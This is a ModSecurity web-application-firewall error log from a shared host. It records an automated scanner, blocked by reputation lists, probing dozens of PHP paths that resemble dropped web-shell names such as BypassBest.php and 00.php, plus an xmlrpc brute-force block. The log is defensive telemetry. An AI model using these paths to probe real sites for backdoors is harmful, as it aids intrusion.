[Tue May 26 14:14:19.655785 2026] [security2:error] [pid 598542:tid 598694] [client 20.151.112.53:8399] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahVdY_4iWyZxnXeAW3JBOAAAABY"]
[Tue May 26 14:14:19.802221 2026] [security2:error] [pid 598542:tid 598735] [client 20.151.112.53:39499] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahVdY_4iWyZxnXeAW3JBQwAAAD8"]
[Tue May 26 14:14:19.802365 2026] [security2:error] [pid 598542:tid 598735] [client 20.151.112.53:39499] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahVdY_4iWyZxnXeAW3JBQwAAAD8"]
[Tue May 26 14:14:20.039429 2026] [security2:error] [pid 598542:tid 598781] [client 20.151.112.53:43310] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahVdZP4iWyZxnXeAW3JBRwAAAG0"]
[Tue May 26 14:14:20.039588 2026] [security2:error] [pid 598542:tid 598781] [client 20.151.112.53:43310] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/ms-edit.php"] [unique_id "ahVdZP4iWyZxnXeAW3JBRwAAAG0"]
[Tue May 26 14:14:20.101197 2026] [security2:error] [pid 598542:tid 598720] [client 202.141.30.10:65422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdZP4iWyZxnXeAW3JBSAAAADA"]
[Tue May 26 14:14:20.101312 2026] [security2:error] [pid 598542:tid 598720] [client 202.141.30.10:65422] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVdZP4iWyZxnXeAW3JBSAAAADA"]
[Tue May 26 14:14:20.169300 2026] [security2:error] [pid 598542:tid 598721] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdY_4iWyZxnXeAW3JBPQAAADE"]
[Tue May 26 14:14:20.390670 2026] [security2:error] [pid 598542:tid 598795] [client 20.151.112.53:31186] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahVdZP4iWyZxnXeAW3JBTAAAAHs"]
[Tue May 26 14:14:20.390793 2026] [security2:error] [pid 598542:tid 598795] [client 20.151.112.53:31186] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahVdZP4iWyZxnXeAW3JBTAAAAHs"]
[Tue May 26 14:14:20.612884 2026] [security2:error] [pid 598542:tid 598689] [client 20.151.112.53:42690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-bin/index.php"] [unique_id "ahVdZP4iWyZxnXeAW3JBUwAAABE"]
[Tue May 26 14:14:20.612996 2026] [security2:error] [pid 598542:tid 598689] [client 20.151.112.53:42690] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-bin/index.php"] [unique_id "ahVdZP4iWyZxnXeAW3JBUwAAABE"]
[Tue May 26 14:14:20.847649 2026] [security2:error] [pid 598542:tid 598770] [client 20.151.112.53:39488] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-includes/css/dist/"] [unique_id "ahVdZP4iWyZxnXeAW3JBVAAAAGI"]
[Tue May 26 14:14:20.921472 2026] [security2:error] [pid 598542:tid 598769] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdZP4iWyZxnXeAW3JBVgAAAGE"]
[Tue May 26 14:14:20.993094 2026] [security2:error] [pid 598542:tid 598792] [client 20.151.112.53:39488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/BDKR28WP.php"] [unique_id "ahVdZP4iWyZxnXeAW3JBWgAAAHg"]
[Tue May 26 14:14:20.993192 2026] [security2:error] [pid 598542:tid 598792] [client 20.151.112.53:39488] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/BDKR28WP.php"] [unique_id "ahVdZP4iWyZxnXeAW3JBWgAAAHg"]
[Tue May 26 14:14:21.276368 2026] [security2:error] [pid 598542:tid 598714] [client 20.151.112.53:31231] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-includes/l10n/"] [unique_id "ahVdZf4iWyZxnXeAW3JBZAAAACo"]
[Tue May 26 14:14:21.350505 2026] [security2:error] [pid 598542:tid 598717] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdZf4iWyZxnXeAW3JBZQAAAC0"]
[Tue May 26 14:14:21.429504 2026] [security2:error] [pid 598542:tid 598797] [client 20.151.112.53:31231] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-content/uploads/"] [unique_id "ahVdZf4iWyZxnXeAW3JBaQAAAH0"]
[Tue May 26 14:14:21.504497 2026] [security2:error] [pid 598542:tid 598692] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdZf4iWyZxnXeAW3JBbgAAABQ"]
[Tue May 26 14:14:21.585987 2026] [security2:error] [pid 598542:tid 598712] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdZf4iWyZxnXeAW3JBYgAAACg"]
[Tue May 26 14:14:21.595698 2026] [security2:error] [pid 598542:tid 598710] [client 20.151.112.53:31231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahVdZf4iWyZxnXeAW3JBdgAAACY"]
[Tue May 26 14:14:21.595803 2026] [security2:error] [pid 598542:tid 598710] [client 20.151.112.53:31231] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahVdZf4iWyZxnXeAW3JBdgAAACY"]
[Tue May 26 14:14:21.743565 2026] [security2:error] [pid 598542:tid 598696] [client 20.151.112.53:4844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahVdZf4iWyZxnXeAW3JBegAAABg"]
[Tue May 26 14:14:21.743669 2026] [security2:error] [pid 598542:tid 598696] [client 20.151.112.53:4844] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/abcd.php"] [unique_id "ahVdZf4iWyZxnXeAW3JBegAAABg"]
[Tue May 26 14:14:22.055061 2026] [security2:error] [pid 598542:tid 598716] [client 20.151.112.53:31229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahVdZv4iWyZxnXeAW3JBggAAACw"]
[Tue May 26 14:14:22.055170 2026] [security2:error] [pid 598542:tid 598716] [client 20.151.112.53:31229] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/a1.php"] [unique_id "ahVdZv4iWyZxnXeAW3JBggAAACw"]
[Tue May 26 14:14:22.209666 2026] [security2:error] [pid 598542:tid 598752] [client 20.151.112.53:22844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-includes/Text/Diff/Engine/about.php"] [unique_id "ahVdZv4iWyZxnXeAW3JBgwAAAFA"]
[Tue May 26 14:14:22.209764 2026] [security2:error] [pid 598542:tid 598752] [client 20.151.112.53:22844] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-includes/Text/Diff/Engine/about.php"] [unique_id "ahVdZv4iWyZxnXeAW3JBgwAAAFA"]
[Tue May 26 14:14:22.359333 2026] [security2:error] [pid 598542:tid 598798] [client 20.151.112.53:22236] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/bal.php"] [unique_id "ahVdZv4iWyZxnXeAW3JBigAAAH4"]
[Tue May 26 14:14:22.359441 2026] [security2:error] [pid 598542:tid 598798] [client 20.151.112.53:22236] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/bal.php"] [unique_id "ahVdZv4iWyZxnXeAW3JBigAAAH4"]
[Tue May 26 14:14:22.477115 2026] [security2:error] [pid 598542:tid 598677] [client 4.201.75.230:56260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mexicoimportaciones.com"] [uri "/wk/index.php"] [unique_id "ahVdZv4iWyZxnXeAW3JBjwAAAAU"]
[Tue May 26 14:14:22.511179 2026] [security2:error] [pid 598542:tid 598689] [client 20.151.112.53:22837] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-bin/admin.php"] [unique_id "ahVdZv4iWyZxnXeAW3JBkQAAABE"]
[Tue May 26 14:14:22.511311 2026] [security2:error] [pid 598542:tid 598689] [client 20.151.112.53:22837] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-bin/admin.php"] [unique_id "ahVdZv4iWyZxnXeAW3JBkQAAABE"]
[Tue May 26 14:14:22.695466 2026] [security2:error] [pid 598542:tid 598727] [client 20.151.112.53:22795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/gettest.php"] [unique_id "ahVdZv4iWyZxnXeAW3JBnQAAADc"]
[Tue May 26 14:14:22.695599 2026] [security2:error] [pid 598542:tid 598727] [client 20.151.112.53:22795] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/gettest.php"] [unique_id "ahVdZv4iWyZxnXeAW3JBnQAAADc"]
[Tue May 26 14:14:22.897043 2026] [security2:error] [pid 598542:tid 598681] [client 20.151.112.53:52561] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-content/BypassBest.php"] [unique_id "ahVdZv4iWyZxnXeAW3JBngAAAAk"]
[Tue May 26 14:14:22.897160 2026] [security2:error] [pid 598542:tid 598681] [client 20.151.112.53:52561] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-content/BypassBest.php"] [unique_id "ahVdZv4iWyZxnXeAW3JBngAAAAk"]
[Tue May 26 14:14:23.072107 2026] [security2:error] [pid 598542:tid 598738] [client 20.151.112.53:43324] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-content/"] [unique_id "ahVdZ_4iWyZxnXeAW3JBpgAAAEI"]
[Tue May 26 14:14:23.146405 2026] [security2:error] [pid 598542:tid 598707] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdZ_4iWyZxnXeAW3JBpwAAACM"]
[Tue May 26 14:14:23.219778 2026] [security2:error] [pid 598542:tid 598732] [client 20.151.112.53:43324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/simple.php"] [unique_id "ahVdZ_4iWyZxnXeAW3JBrQAAADw"]
[Tue May 26 14:14:23.219863 2026] [security2:error] [pid 598542:tid 598732] [client 20.151.112.53:43324] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/simple.php"] [unique_id "ahVdZ_4iWyZxnXeAW3JBrQAAADw"]
[Tue May 26 14:14:23.373876 2026] [security2:error] [pid 598542:tid 598719] [client 20.151.112.53:52548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/buy.php"] [unique_id "ahVdZ_4iWyZxnXeAW3JBtAAAAC8"]
[Tue May 26 14:14:23.373968 2026] [security2:error] [pid 598542:tid 598719] [client 20.151.112.53:52548] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/buy.php"] [unique_id "ahVdZ_4iWyZxnXeAW3JBtAAAAC8"]
[Tue May 26 14:14:23.519866 2026] [security2:error] [pid 598542:tid 598761] [client 20.151.112.53:22223] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xxx.php"] [unique_id "ahVdZ_4iWyZxnXeAW3JBtQAAAFk"]
[Tue May 26 14:14:23.519969 2026] [security2:error] [pid 598542:tid 598761] [client 20.151.112.53:22223] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/xxx.php"] [unique_id "ahVdZ_4iWyZxnXeAW3JBtQAAAFk"]
[Tue May 26 14:14:23.683584 2026] [security2:error] [pid 598542:tid 598757] [client 20.151.112.53:42712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/hypo.php"] [unique_id "ahVdZ_4iWyZxnXeAW3JBvQAAAFU"]
[Tue May 26 14:14:23.683696 2026] [security2:error] [pid 598542:tid 598757] [client 20.151.112.53:42712] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/hypo.php"] [unique_id "ahVdZ_4iWyZxnXeAW3JBvQAAAFU"]
[Tue May 26 14:14:23.849147 2026] [security2:error] [pid 598542:tid 598794] [client 20.151.112.53:26726] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-admin/css/colors/blue/"] [unique_id "ahVdZ_4iWyZxnXeAW3JBxQAAAHo"]
[Tue May 26 14:14:23.926206 2026] [security2:error] [pid 598542:tid 598677] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdZ_4iWyZxnXeAW3JBywAAAAU"]
[Tue May 26 14:14:24.015562 2026] [security2:error] [pid 598542:tid 598799] [client 20.151.112.53:26726] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/chosen.php"] [unique_id "ahVdaP4iWyZxnXeAW3JBzAAAAH8"]
[Tue May 26 14:14:24.015703 2026] [security2:error] [pid 598542:tid 598799] [client 20.151.112.53:26726] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/chosen.php"] [unique_id "ahVdaP4iWyZxnXeAW3JBzAAAAH8"]
[Tue May 26 14:14:24.222283 2026] [security2:error] [pid 598542:tid 598676] [client 20.151.112.53:42728] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-includes/block-bindings/"] [unique_id "ahVdaP4iWyZxnXeAW3JB1gAAAAQ"]
[Tue May 26 14:14:24.273716 2026] [security2:error] [pid 598542:tid 598766] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVdZ_4iWyZxnXeAW3JBxwAAAF4"]
[Tue May 26 14:14:24.300420 2026] [security2:error] [pid 598542:tid 598771] [client 20.151.112.53:42101] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/cgi-sys/404.html"] [unique_id "ahVdaP4iWyZxnXeAW3JB2gAAAGM"]
[Tue May 26 14:14:24.371954 2026] [security2:error] [pid 598542:tid 598774] [client 20.151.112.53:42728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/00.php"] [unique_id "ahVdaP4iWyZxnXeAW3JB3AAAAGY"]
[Tue May 26 14:14:24.372081 2026] [security2:error] [pid 598542:tid 598774] [client 20.151.112.53:42728] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/00.php"] [unique_id "ahVdaP4iWyZxnXeAW3JB3AAAAGY"]
[Tue May 26 14:14:24.776946 2026] [security2:error] [pid 598542:tid 598773] [client 20.151.112.53:8414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/als.php"] [unique_id "ahVdaP4iWyZxnXeAW3JB4AAAAGU"]
[Tue May 26 14:14:24.777065 2026] [security2:error] [pid 598542:tid 598773] [client 20.151.112.53:8414] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/als.php"] [unique_id "ahVdaP4iWyZxnXeAW3JB4AAAAGU"]
[Tue May 26 14:14:24.949784 2026] [security2:error] [pid 598542:tid 598694] [client 20.151.112.53:39488] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.112.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/pol.php"] [unique_id "ahVdaP4iWyZxnXeAW3JB5AAAABY"]
[Tue May 26 14:14:24.949892 2026] [security2:error] [pid 598542:tid 598694] [client 20.151.112.53:39488] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/pol.php"] [unique_id "ahVdaP4iWyZxnXeAW3JB5AAAABY"]
